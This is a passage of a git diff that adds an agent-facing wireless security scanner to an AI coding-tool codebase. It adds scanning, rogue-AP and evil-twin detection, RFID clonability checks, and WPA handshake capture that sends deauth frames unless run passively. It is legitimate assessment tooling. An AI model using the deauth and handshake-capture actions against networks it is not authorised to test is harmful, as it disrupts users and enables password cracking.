+    if (!baseline.name.toLowerCase().includes(type.toLowerCase())) {
+      baseline.name = `${type}-${baseline.name}`
+    }
+    return saveBaseline(baseline, config)
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/tool.ts b/packages/opencode/src/pentest/wirelessscan/tool.ts
new file mode 100644
index 00000000000..9aa72082210
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/tool.ts
@@ -0,0 +1,763 @@
+/**
+ * @fileoverview Wireless Scan Tool
+ *
+ * Agent-facing tool for wireless security scanning.
+ *
+ * @module pentest/wirelessscan/tool
+ */
+
+import z from "zod"
+import { spawn } from "child_process"
+import { Tool } from "../../tool/tool"
+import { WirelessScanOrchestrator } from "./orchestrator"
+import { WirelessScanProfiles } from "./profiles"
+import { WirelessScanStorage } from "./storage"
+import { WiFiDiscovery } from "./wifi/discovery"
+import { WiFiRogueAP } from "./wifi/rogue-ap"
+import { WiFiHandshake } from "./wifi/handshake"
+import { BluetoothDiscovery } from "./bluetooth/discovery"
+import { RFIDDiscovery } from "./rfid/discovery"
+import { RFIDReaders } from "./rfid/readers"
+import { RFIDCards } from "./rfid/cards"
+
+/**
+ * Execute a shell command and return the result.
+ */
+async function execCommand(cmd: string): Promise<{ stdout: string; stderr: string; exitCode: number }> {
+  return new Promise((resolve) => {
+    const proc = spawn("sh", ["-c", cmd], { stdio: ["ignore", "pipe", "pipe"] })
+    let stdout = ""
+    let stderr = ""
+
+    proc.stdout?.on("data", (data) => {
+      stdout += data.toString()
+    })
+
+    proc.stderr?.on("data", (data) => {
+      stderr += data.toString()
+    })
+
+    proc.on("close", (code) => {
+      resolve({ stdout, stderr, exitCode: code || 0 })
+    })
+
+    proc.on("error", () => {
+      resolve({ stdout, stderr, exitCode: 1 })
+    })
+  })
+}
+
+/**
+ * Wrap output in proper tool response format.
+ */
+function formatResponse(title: string, output: string, metadata: Record<string, unknown> = {}) {
+  return { title, output, metadata }
+}
+
+/**
+ * Tool parameter schema.
+ */
+const ParameterSchema = z.object({
+  action: z.enum([
+    "scan",
+    "wifi",
+    "bluetooth",
+    "rfid",
+    "interfaces",
+    "networks",
+    "devices",
+    "tags",
+    "security",
+    "rogue-ap",
+    "handshake",
+    "baseline",
+    "report",
+    "status",
+    "stop",
+    "profiles",
+  ]),
+  // Common options
+  profile: z.enum(["discovery", "quick", "standard", "thorough", "passive", "active"]).optional(),
+  interface: z.string().optional(),
+  duration: z.number().optional(),
+  passive: z.boolean().optional(),
+  scanId: z.string().optional(),
+
+  // WiFi options
+  channel: z.number().optional(),
+  bssid: z.string().optional(),
+  ssid: z.string().optional(),
+  band: z.enum(["2.4", "5", "6"]).optional(),
+
+  // Bluetooth options
+  address: z.string().optional(),
+  bleOnly: z.boolean().optional(),
+  classicOnly: z.boolean().optional(),
+
+  // RFID options
+  reader: z.string().optional(),
+  frequency: z.enum(["125khz", "13.56mhz"]).optional(),
+  tagType: z.string().optional(),
+
+  // Baseline options
+  baselineName: z.string().optional(),
+  baselineAction: z.enum(["create", "load", "compare"]).optional(),
+
+  // Output options
+  verbose: z.boolean().optional(),
+})
+
+type Parameters = z.infer<typeof ParameterSchema>
+
+/**
+ * Wireless Scanner Tool.
+ */
+export const WirelessScanTool = Tool.define("wirelessscan", async () => {
+  return {
+    description: `Wireless security scanner for WiFi, Bluetooth, and RFID/NFC assessment.
+
+Actions:
+- scan: Full wireless scan with specified profile
+- wifi: WiFi-specific scanning
+- bluetooth: Bluetooth device scanning
+- rfid: RFID/NFC tag scanning
+- interfaces: List available wireless interfaces
+- networks: List discovered WiFi networks
+- devices: List discovered Bluetooth devices
+- tags: List discovered RFID/NFC tags
+- security: Security assessment for a scan
+- rogue-ap: Rogue AP and evil twin detection
+- handshake: Capture/analyze WPA handshakes
+- baseline: Manage network baselines (create/load/compare)
+- report: Generate scan report
+- status: Get scan status
+- stop: Stop a running scan
+- profiles: List available scan profiles
+
+Profiles: discovery, quick, standard, thorough, passive, active
+
+WiFi Capabilities:
+- Network discovery and enumeration
+- WPA/WPA2/WPA3 security assessment
+- KRACK, Dragonblood vulnerability detection
+- Rogue AP and evil twin detection
+- Client enumeration and probe analysis
+- Handshake capture and analysis
+- Deauthentication attack detection
+
+Bluetooth Capabilities:
+- Classic Bluetooth and BLE scanning
+- Service enumeration
+- BlueBorne, KNOB, BIAS vulnerability checks
+- Device profiling and classification
+
+RFID/NFC Capabilities:
+- Tag discovery and identification
+- MIFARE Classic/DESFire/NTAG/HID/EM4100 support
+- Cloning vulnerability assessment
+- Default key detection
+- Magic card detection
+
+External Tool Integration:
+- Aircrack-ng, Kismet, Bettercap (WiFi)
+- Ubertooth, hcitool, bluetoothctl (Bluetooth)
+- Proxmark3, libnfc (RFID/NFC)`,
+    parameters: ParameterSchema,
+
+    async execute(params: Parameters) {
+      switch (params.action) {
+        case "scan":
+          return formatResponse("Wireless Scan", await executeScan(params, execCommand), { action: "scan" })
+
+        case "wifi":
+          return formatResponse("WiFi Scan", await executeWiFiScan(params, execCommand), { action: "wifi" })
+
+        case "bluetooth":
+          return formatResponse("Bluetooth Scan", await executeBluetoothScan(params, execCommand), { action: "bluetooth" })
+
+        case "rfid":
+          return formatResponse("RFID Scan", await executeRFIDScan(params, execCommand), { action: "rfid" })
+
+        case "interfaces":
+          return formatResponse("Wireless Interfaces", await executeListInterfaces(params, execCommand), { action: "interfaces" })
+
+        case "networks":
+          return formatResponse("WiFi Networks", await executeListNetworks(params), { action: "networks" })
+
+        case "devices":
+          return formatResponse("Bluetooth Devices", await executeListDevices(params), { action: "devices" })
+
+        case "tags":
+          return formatResponse("RFID Tags", await executeListTags(params), { action: "tags" })
+
+        case "security":
+          return formatResponse("Security Assessment", await executeSecurityAssessment(params), { action: "security" })
+
+        case "rogue-ap":
+          return formatResponse("Rogue AP Detection", await executeRogueAPDetection(params), { action: "rogue-ap" })
+
+        case "handshake":
+          return formatResponse("Handshake Capture", await executeHandshakeCapture(params, execCommand), { action: "handshake" })
+
+        case "baseline":
+          return formatResponse("Network Baseline", await executeBaseline(params, execCommand), { action: "baseline" })
+
+        case "report":
+          return formatResponse("Scan Report", await executeReport(params), { action: "report" })
+
+        case "status":
+          return formatResponse("Scan Status", await executeStatus(params), { action: "status" })
+
+        case "stop":
+          return formatResponse("Stop Scan", await executeStop(params), { action: "stop" })
+
+        case "profiles":
+          return formatResponse("Scan Profiles", executeProfiles(), { action: "profiles" })
+
+        default:
+          return formatResponse("Unknown Action", `Unknown action: ${params.action}`, { action: params.action, status: "error" })
+      }
+    },
+  }
+})
+
+// ========== Action Handlers ==========
+
+async function executeScan(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const scanId = await WirelessScanOrchestrator.startScan(
+    {
+      profileName: params.profile,
+      interface: params.interface,
+      duration: params.duration,
+      channel: params.channel,
+      passive: params.passive,
+    },
+    execCommand
+  )
+
+  return formatOutput({
+    success: true,
+    action: "scan",
+    message: `Wireless scan started with profile '${params.profile || "standard"}'`,
+    scanId,
+  }, params.verbose)
+}
+
+async function executeWiFiScan(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const scanId = await WirelessScanOrchestrator.startScan(
+    {
+      profileName: params.profile,
+      wirelessTypes: ["wifi"],
+      interface: params.interface,
+      duration: params.duration,
+      channel: params.channel,
+      passive: params.passive,
+    },
+    execCommand
+  )
+
+  return formatOutput({
+    success: true,
+    action: "wifi",
+    message: "WiFi scan started",
+    scanId,
+  }, params.verbose)
+}
+
+async function executeBluetoothScan(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const scanId = await WirelessScanOrchestrator.startScan(
+    {
+      profileName: params.profile,
+      wirelessTypes: ["bluetooth"],
+      duration: params.duration,
+      passive: params.passive,
+    },
+    execCommand
+  )
+
+  return formatOutput({
+    success: true,
+    action: "bluetooth",
+    message: "Bluetooth scan started",
+    scanId,
+  }, params.verbose)
+}
+
+async function executeRFIDScan(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const scanId = await WirelessScanOrchestrator.startScan(
+    {
+      profileName: params.profile,
+      wirelessTypes: ["rfid"],
+      duration: params.duration,
+    },
+    execCommand
+  )
+
+  return formatOutput({
+    success: true,
+    action: "rfid",
+    message: "RFID/NFC scan started",
+    scanId,
+  }, params.verbose)
+}
+
+async function executeListInterfaces(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const wifiInterfaces = await WiFiDiscovery.detectInterfaces(execCommand)
+  const btInterfaces = await BluetoothDiscovery.detectInterfaces(execCommand)
+  const rfidReaders = await RFIDDiscovery.detectReaders(execCommand)
+
+  const lines: string[] = ["Wireless Interfaces:", ""]
+
+  if (wifiInterfaces.length > 0) {
+    lines.push("WiFi:")
+    for (const iface of wifiInterfaces) {
+      lines.push(`  ${iface.name}: ${iface.driver || "unknown"} (Monitor: ${iface.monitor ? "Yes" : "No"})`)
+    }
+  } else {
+    lines.push("WiFi: None detected")
+  }
+
+  if (btInterfaces.length > 0) {
+    lines.push("", "Bluetooth:")
+    for (const iface of btInterfaces) {
+      lines.push(`  ${iface.name}: ${iface.address} (${iface.type})`)
+    }
+  } else {
+    lines.push("", "Bluetooth: None detected")
+  }
+
+  if (rfidReaders.length > 0) {
+    lines.push("", "RFID/NFC:")
+    for (const reader of rfidReaders) {
+      lines.push(`  ${reader.name}: ${reader.type}`)
+    }
+  } else {
+    lines.push("", "RFID/NFC: None detected")
+  }
+
+  lines.push("")
+  lines.push(`Summary: ${wifiInterfaces.length} WiFi, ${btInterfaces.length} Bluetooth, ${rfidReaders.length} RFID`)
+
+  return lines.join("\n")
+}
+
+async function executeListNetworks(params: Parameters): Promise<string> {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+  if (!results) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  const networks = results.networks || []
+
+  if (networks.length === 0) {
+    return "No WiFi networks discovered"
+  }
+
+  const lines: string[] = [`WiFi Networks (${networks.length}):`, ""]
+
+  for (const network of networks) {
+    lines.push(`${network.ssid || "(Hidden)"} (${network.bssid})`)
+    lines.push(`  Channel: ${network.channel}, Signal: ${network.signal}dBm`)
+    lines.push(`  Security: ${network.encryption}`)
+    if (network.clients && network.clients.length > 0) {
+      lines.push(`  Clients: ${network.clients.length}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+async function executeListDevices(params: Parameters): Promise<string> {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+  if (!results) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  let devices = results.bluetoothDevices || []
+
+  if (params.bleOnly) {
+    devices = devices.filter((d) => d.type === "ble")
+  } else if (params.classicOnly) {
+    devices = devices.filter((d) => d.type === "classic")
+  }
+
+  if (devices.length === 0) {
+    return "No Bluetooth devices discovered"
+  }
+
+  const lines: string[] = [`Bluetooth Devices (${devices.length}):`, ""]
+
+  for (const device of devices) {
+    lines.push(`${device.name || "(Unknown)"} (${device.address})`)
+    lines.push(`  Type: ${device.type}, RSSI: ${device.rssi}dBm`)
+    if (device.services && device.services.length > 0) {
+      lines.push(`  Services: ${device.services.length}`)
+    }
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+async function executeListTags(params: Parameters): Promise<string> {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+  if (!results) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  const tags = results.rfidTags || []
+
+  if (tags.length === 0) {
+    return "No RFID/NFC tags discovered"
+  }
+
+  const lines: string[] = [`RFID/NFC Tags (${tags.length}):`, ""]
+
+  for (const tag of tags) {
+    const cardInfo = RFIDCards.getCardInfo(tag.type)
+    lines.push(`${cardInfo.name} (${tag.uid})`)
+    lines.push(`  Frequency: ${tag.frequency}, Protocol: ${tag.protocol}`)
+    lines.push(`  Security: ${cardInfo.securityLevel}, Cloneable: ${cardInfo.cloneable ? "Yes" : "No"}`)
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+async function executeSecurityAssessment(params: Parameters): Promise<string> {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+  if (!results) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  const findings = results.findings
+  const bySeverity = {
+    critical: findings.filter((f) => f.severity === "critical"),
+    high: findings.filter((f) => f.severity === "high"),
+    medium: findings.filter((f) => f.severity === "medium"),
+    low: findings.filter((f) => f.severity === "low"),
+    info: findings.filter((f) => f.severity === "info"),
+  }
+
+  const byType = {
+    wifi: findings.filter((f) => f.wirelessType === "wifi"),
+    bluetooth: findings.filter((f) => f.wirelessType === "bluetooth"),
+    rfid: findings.filter((f) => f.wirelessType === "rfid"),
+  }
+
+  const lines: string[] = ["Security Assessment:", ""]
+  lines.push(`Total Findings: ${findings.length}`)
+  lines.push("")
+  lines.push("By Severity:")
+  lines.push(`  Critical: ${bySeverity.critical.length}`)
+  lines.push(`  High: ${bySeverity.high.length}`)
+  lines.push(`  Medium: ${bySeverity.medium.length}`)
+  lines.push(`  Low: ${bySeverity.low.length}`)
+  lines.push(`  Info: ${bySeverity.info.length}`)
+  lines.push("")
+  lines.push("By Type:")
+  lines.push(`  WiFi: ${byType.wifi.length}`)
+  lines.push(`  Bluetooth: ${byType.bluetooth.length}`)
+  lines.push(`  RFID/NFC: ${byType.rfid.length}`)
+
+  if (bySeverity.critical.length > 0 || bySeverity.high.length > 0) {
+    lines.push("")
+    lines.push("Critical/High Findings:")
+    for (const finding of [...bySeverity.critical, ...bySeverity.high]) {
+      lines.push(`  [${finding.severity.toUpperCase()}] ${finding.title}`)
+      lines.push(`    ${finding.description.slice(0, 80)}...`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+async function executeRogueAPDetection(params: Parameters): Promise<string> {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+  if (!results) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  const baseline = await WirelessScanStorage.loadBaseline("wifi")
+  if (!baseline) {
+    return "Error: No baseline defined. Create a baseline first with: wirelessscan baseline baselineAction=create scanId=<id>"
+  }
+
+  const networks = results.networks || []
+  // detectAgainstBaseline returns RogueAP[] directly
+  const rogueAPs = WiFiRogueAP.detectAgainstBaseline(networks, baseline, params.scanId)
+  const evilTwins = WiFiRogueAP.detectEvilTwins(networks, params.scanId)
+
+  // Categorize rogueAPs by reason
+  const knownChanged = rogueAPs.filter((ap) =>
+    ["channel_mismatch", "encryption_downgrade", "duplicate_essid"].includes(ap.reason)
+  )
+  const unknownAPs = rogueAPs.filter((ap) => ap.reason === "new_network")
+  const otherRogues = rogueAPs.filter((ap) =>
+    !["channel_mismatch", "encryption_downgrade", "duplicate_essid", "new_network"].includes(ap.reason)
+  )
+
+  const lines: string[] = ["Rogue AP Detection Results:", ""]
+  lines.push(`Rogue APs (changed): ${knownChanged.length}`)
+  lines.push(`Unknown APs: ${unknownAPs.length}`)
+  lines.push(`Potential Evil Twins: ${evilTwins.length}`)
+  lines.push(`Other Suspicious APs: ${otherRogues.length}`)
+
+  if (knownChanged.length > 0) {
+    lines.push("")
+    lines.push("Rogue APs (known but changed):")
+    for (const ap of knownChanged) {
+      lines.push(`  ${ap.essid || "(Hidden)"} (${ap.bssid}) - ${ap.reason}`)
+    }
+  }
+
+  if (unknownAPs.length > 0) {
+    lines.push("")
+    lines.push("Unknown APs (not in baseline):")
+    for (const ap of unknownAPs) {
+      lines.push(`  ${ap.essid || "(Hidden)"} (${ap.bssid})`)
+    }
+  }
+
+  if (evilTwins.length > 0) {
+    lines.push("")
+    lines.push("Potential Evil Twins:")
+    for (const ap of evilTwins) {
+      lines.push(`  ${ap.essid}: ${ap.bssid} (confidence: ${ap.confidence}%)`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+async function executeHandshakeCapture(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  if (!params.bssid) {
+    return "Error: bssid required for handshake capture"
+  }
+
+  const captureResult = await WiFiHandshake.captureHandshake(
+    params.bssid,
+    {
+      interface: params.interface,
+      channel: params.channel,
+      duration: params.duration || 60,
+      deauth: !params.passive,
+    },
+    execCommand
+  )
+
+  if (!captureResult.success) {
+    return `Error: ${captureResult.error || "Handshake capture failed"}`
+  }
+
+  const lines: string[] = ["Handshake Capture Results:", ""]
+  lines.push(`Target BSSID: ${params.bssid}`)
+  lines.push(`Handshakes Captured: ${captureResult.handshakes?.length || 0}`)
+
+  if (captureResult.handshakes && captureResult.handshakes.length > 0) {
+    lines.push("")
+    for (const handshake of captureResult.handshakes) {
+      const quality = WiFiHandshake.assessHandshakeQuality(handshake)
+      lines.push(`Client: ${handshake.clientMac || "(unknown)"}`)
+      lines.push(`  Quality: ${quality.quality}`)
+      lines.push(`  Type: ${handshake.type}`)
+      lines.push(`  Crackable: ${quality.crackable ? "Yes" : "No"}`)
+      if (quality.issues.length > 0) {
+        lines.push(`  Issues: ${quality.issues.join(", ")}`)
+      }
+      if (captureResult.pcapFile) {
+        lines.push(`  PCAP: ${captureResult.pcapFile}`)
+      }
+    }
+  }
+
+  return lines.join("\n")
+}
+
+async function executeBaseline(
+  params: Parameters,
+  execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+): Promise<string> {
+  const action = params.baselineAction || "load"
+
+  switch (action) {
+    case "create": {
+      if (!params.scanId) {
+        return "Error: scanId required to create baseline"
+      }
+
+      const name = params.baselineName || `baseline-${Date.now()}`
+      const created = await WirelessScanOrchestrator.createBaseline(params.scanId, name)
+
+      return created
+        ? `Baseline '${name}' created from scan ${params.scanId}`
+        : "Failed to create baseline (scan not found or not completed)"
+    }
+
+    case "load": {
+      const baseline = await WirelessScanStorage.loadBaseline("wifi")
+
+      if (!baseline) {
+        return "No baseline found. Create one with: wirelessscan baseline baselineAction=create scanId=<id>"
+      }
+
+      return `Baseline '${baseline.name}' loaded with ${baseline.networks.length} networks`
+    }
+
+    case "compare": {
+      if (!params.scanId) {
+        return "Error: scanId required to compare with baseline"
+      }
+
+      const results = WirelessScanOrchestrator.getScanResults(params.scanId)
+      const baseline = await WirelessScanStorage.loadBaseline("wifi")
+
+      if (!results) {
+        return `Error: Scan not found: ${params.scanId}`
+      }
+      if (!baseline) {
+        return "Error: No baseline found"
+      }
+
+      const networks = results.networks || []
+      // detectAgainstBaseline returns RogueAP[] directly
+      const rogueAPs = WiFiRogueAP.detectAgainstBaseline(networks, baseline, params.scanId)
+
+      // Categorize by reason
+      const changed = rogueAPs.filter((ap) =>
+        ["channel_mismatch", "encryption_downgrade", "duplicate_essid"].includes(ap.reason)
+      )
+      const unknown = rogueAPs.filter((ap) => ap.reason === "new_network")
+
+      return `Baseline Comparison: ${changed.length} changed, ${unknown.length} unknown APs (total: ${rogueAPs.length} findings)`
+    }
+
+    default:
+      return `Unknown baseline action: ${action}`
+  }
+}
+
+function executeReport(params: Parameters): string {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const report = WirelessScanOrchestrator.generateReport(params.scanId)
+
+  if (!report) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  return report
+}
+
+function executeStatus(params: Parameters): string {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const status = WirelessScanOrchestrator.getScanStatus(params.scanId)
+
+  if (!status) {
+    return `Error: Scan not found: ${params.scanId}`
+  }
+
+  const lines: string[] = [`Scan Status: ${params.scanId}`, ""]
+  lines.push(`Status: ${status.status}`)
+  lines.push(`Findings: ${status.findingCount}`)
+  lines.push(`Networks: ${status.networkCount}`)
+  lines.push(`Bluetooth Devices: ${status.deviceCount}`)
+  lines.push(`RFID Tags: ${status.tagCount}`)
+
+  if (status.error) {
+    lines.push(`Error: ${status.error}`)
+  }
+
+  return lines.join("\n")
+}
+
+function executeStop(params: Parameters): string {
+  if (!params.scanId) {
+    return "Error: scanId required"
+  }
+
+  const stopped = WirelessScanOrchestrator.stopScan(params.scanId)
+
+  return stopped
+    ? `Scan ${params.scanId} stopped`
+    : `Could not stop scan ${params.scanId} (not running or not found)`
+}
+
+function executeProfiles(): string {
+  const profiles = WirelessScanProfiles.listProfiles()
+
+  const lines = ["Available Scan Profiles:", ""]
+  for (const profile of profiles) {
+    lines.push(`${profile.name}: ${profile.description}`)
+    lines.push(`  Wireless Types: ${profile.wirelessTypes.join(", ")}`)
+    lines.push(`  Duration: ${profile.scanDuration}s`)
+    lines.push("")
+  }
+
+  return lines.join("\n")
+}
+
+// ========== Helpers ==========
+
+function formatOutput(data: Record<string, unknown>, verbose?: boolean): string {
+  if (verbose) {
+    return JSON.stringify(data, null, 2)
+  }
+
+  const lines: string[] = []
+  if (data.message) {
+    lines.push(String(data.message))
+  }
+  if (data.scanId) {
+    lines.push(`Scan ID: ${data.scanId}`)
+  }
+  if (data.error) {
+    lines.push(`Error: ${data.error}`)
+  }
+
+  return lines.join("\n")
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/types.ts b/packages/opencode/src/pentest/wirelessscan/types.ts
new file mode 100644
index 00000000000..076ff21beef
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/types.ts
@@ -0,0 +1,603 @@
+/**
+ * @fileoverview Wireless Scanner Types
+ *
+ * Zod schemas and TypeScript types for wireless security scanning
+ * including WiFi, Bluetooth, and RFID/NFC.
+ *
+ * @module pentest/wirelessscan/types
+ */
+
+import z from "zod"
+
+/**
+ * Wireless scanner types namespace.
+ */
+export namespace WirelessScanTypes {
+  // ========== Common Types ==========
+
+  /**
+   * Severity levels.
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * Scan profile IDs.
+   */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "passive", "active"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Wireless technology types.
+   */
+  export const WirelessType = z.enum(["wifi", "bluetooth", "rfid", "nfc"])
+  export type WirelessType = z.infer<typeof WirelessType>
+
+  // ========== Interface Types ==========
+
+  /**
+   * Wireless interface mode.
+   */
+  export const InterfaceMode = z.enum(["managed", "monitor", "master", "ad-hoc", "mesh", "unknown"])
+  export type InterfaceMode = z.infer<typeof InterfaceMode>
+
+  /**
+   * Wireless interface.
+   */
+  export const WirelessInterface = z.object({
+    name: z.string(),
+    driver: z.string().optional(),
+    chipset: z.string().optional(),
+    mode: InterfaceMode,
+    mac: z.string(),
+    channel: z.number().optional(),
+    frequency: z.number().optional(),
+    txPower: z.number().optional(),
+    supportedModes: z.array(z.string()).default([]),
+    supportedBands: z.array(z.string()).default([]),
+    monitorModeSupported: z.boolean().default(false),
+    injectionSupported: z.boolean().default(false),
+    up: z.boolean().default(false),
+    monitor: z.boolean().optional(), // True if interface is in monitor mode
+  })
+  export type WirelessInterface = z.infer<typeof WirelessInterface>
+
+  // ========== WiFi Types ==========
+
+  /**
+   * WiFi encryption types.
+   */
+  export const WiFiEncryption = z.enum(["open", "wep", "wpa", "wpa2", "wpa3", "wpa2/wpa3", "unknown"])
+  export type WiFiEncryption = z.infer<typeof WiFiEncryption>
+
+  /**
+   * WiFi cipher types.
+   */
+  export const WiFiCipher = z.enum(["ccmp", "tkip", "wep", "gcmp", "none", "unknown"])
+  export type WiFiCipher = z.infer<typeof WiFiCipher>
+
+  /**
+   * WiFi authentication types.
+   */
+  export const WiFiAuth = z.enum(["psk", "eap", "sae", "owe", "open", "mgmt", "unknown"])
+  export type WiFiAuth = z.infer<typeof WiFiAuth>
+
+  /**
+   * WiFi frequency band.
+   */
+  export const WiFiBand = z.enum(["2.4ghz", "5ghz", "6ghz", "unknown"])
+  export type WiFiBand = z.infer<typeof WiFiBand>
+
+  /**
+   * WiFi network.
+   */
+  export const WiFiNetwork = z.object({
+    id: z.string(),
+    bssid: z.string(),
+    essid: z.string(),
+    ssid: z.string().optional(), // Alias for essid, used by orchestrator
+    channel: z.number(),
+    frequency: z.number(),
+    band: WiFiBand,
+    signal: z.number(),
+    quality: z.number().min(0).max(100).optional(),
+    noise: z.number().optional(),
+    encryption: WiFiEncryption,
+    cipher: WiFiCipher,
+    authentication: WiFiAuth,
+    wps: z.boolean().default(false),
+    wpsVersion: z.string().optional(),
+    wpsLocked: z.boolean().default(false),
+    hidden: z.boolean().default(false),
+    vendor: z.string().optional(),
+    beacons: z.number().default(0),
+    dataPackets: z.number().default(0),
+    clients: z.array(z.string()).default([]),
+    pmkidVulnerable: z.boolean().optional(),
+    firstSeen: z.number(),
+    lastSeen: z.number(),
+  })
+  export type WiFiNetwork = z.infer<typeof WiFiNetwork>
+
+  /**
+   * WiFi client.
+   */
+  export const WiFiClient = z.object({
+    id: z.string(),
+    mac: z.string(),
+    bssid: z.string().optional(),
+    essid: z.string().optional(),
+    signal: z.number().optional(),
+    noise: z.number().optional(),
+    packets: z.number().default(0),
+    vendor: z.string().optional(),
+    probes: z.array(z.string()).default([]),
+    associated: z.boolean().default(false),
+    firstSeen: z.number(),
+    lastSeen: z.number(),
+  })
+  export type WiFiClient = z.infer<typeof WiFiClient>
+
+  /**
+   * Handshake capture.
+   */
+  export const HandshakeCapture = z.object({
+    id: z.string(),
+    bssid: z.string(),
+    essid: z.string().optional(),
+    clientMac: z.string().optional(),
+    type: z.enum(["4-way", "pmkid", "half", "unknown"]),
+    complete: z.boolean(),
+    filePath: z.string().optional(),
+    capturedAt: z.number(),
+  })
+  export type HandshakeCapture = z.infer<typeof HandshakeCapture>
+
+  /**
+   * Rogue AP detection.
+   */
+  export const RogueAP = z.object({
+    id: z.string(),
+    bssid: z.string(),
+    essid: z.string(),
+    channel: z.number(),
+    signal: z.number(),
+    reason: z.enum([
+      "duplicate_essid",
+      "signal_anomaly",
+      "mac_anomaly",
+      "channel_mismatch",
+      "encryption_downgrade",
+      "new_network",
+      "evil_twin",
+      "karma_attack",
+    ]),
+    legitimateBssid: z.string().optional(),
+    confidence: z.number().min(0).max(100),
+    detectedAt: z.number(),
+  })
+  export type RogueAP = z.infer<typeof RogueAP>
+
+  /**
+   * Deauth attack detection.
+   */
+  export const DeauthAttack = z.object({
+    id: z.string(),
+    sourceMac: z.string(),
+    targetMac: z.string(),
+    bssid: z.string(),
+    count: z.number(),
+    reason: z.number().optional(),
+    startTime: z.number(),
+    lastSeen: z.number(),
+  })
+  export type DeauthAttack = z.infer<typeof DeauthAttack>
+
+  /**
+   * WiFi scan result.
+   */
+  export const WiFiScanResult = z.object({
+    networks: z.array(WiFiNetwork).default([]),
+    clients: z.array(WiFiClient).default([]),
+    handshakes: z.array(HandshakeCapture).default([]),
+    rogueAPs: z.array(RogueAP).default([]),
+    deauthAttacks: z.array(DeauthAttack).default([]),
+  })
+  export type WiFiScanResult = z.infer<typeof WiFiScanResult>
+
+  // ========== Bluetooth Types ==========
+
+  /**
+   * Bluetooth device type.
+   */
+  export const BluetoothType = z.enum(["classic", "ble", "dual", "unknown"])
+  export type BluetoothType = z.infer<typeof BluetoothType>
+
+  /**
+   * Bluetooth device class.
+   */
+  export const BluetoothClass = z.object({
+    major: z.string(),
+    minor: z.string(),
+    services: z.array(z.string()).default([]),
+  })
+  export type BluetoothClass = z.infer<typeof BluetoothClass>
+
+  /**
+   * BLE characteristic.
+   */
+  export const BLECharacteristic = z.object({
+    uuid: z.string(),
+    handle: z.number().optional(),
+    name: z.string().optional(),
+    properties: z.array(z.string()).default([]),
+    value: z.string().optional(),
+    readable: z.boolean().default(false),
+    writable: z.boolean().default(false),
+    notifiable: z.boolean().default(false),
+  })
+  export type BLECharacteristic = z.infer<typeof BLECharacteristic>
+
+  /**
+   * BLE service.
+   */
+  export const BLEService = z.object({
+    uuid: z.string(),
+    handle: z.number().optional(),
+    name: z.string().optional(),
+    primary: z.boolean().default(true),
+    characteristics: z.array(BLECharacteristic).default([]),
+  })
+  export type BLEService = z.infer<typeof BLEService>
+
+  /**
+   * Bluetooth device.
+   */
+  export const BluetoothDevice = z.object({
+    id: z.string(),
+    address: z.string(),
+    name: z.string().optional(),
+    alias: z.string().optional(),
+    deviceClass: BluetoothClass.optional(),
+    type: BluetoothType,
+    rssi: z.number().optional(),
+    txPower: z.number().optional(),
+    manufacturer: z.string().optional(),
+    manufacturerData: z.string().optional(),
+    services: z.array(BLEService).default([]),
+    serviceUuids: z.array(z.string()).default([]),
+    paired: z.boolean().default(false),
+    connected: z.boolean().default(false),
+    trusted: z.boolean().default(false),
+    blocked: z.boolean().default(false),
+    legacyPairing: z.boolean().optional(),
+    uuids: z.array(z.string()).default([]),
+    firstSeen: z.number(),
+    lastSeen: z.number(),
+  })
+  export type BluetoothDevice = z.infer<typeof BluetoothDevice>
+
+  /**
+   * Bluetooth scan result.
+   */
+  export const BluetoothScanResult = z.object({
+    devices: z.array(BluetoothDevice).default([]),
+    classicDevices: z.number().default(0),
+    bleDevices: z.number().default(0),
+    dualDevices: z.number().default(0),
+  })
+  export type BluetoothScanResult = z.infer<typeof BluetoothScanResult>
+
+  // ========== RFID/NFC Types ==========
+
+  /**
+   * RFID/NFC frequency.
+   */
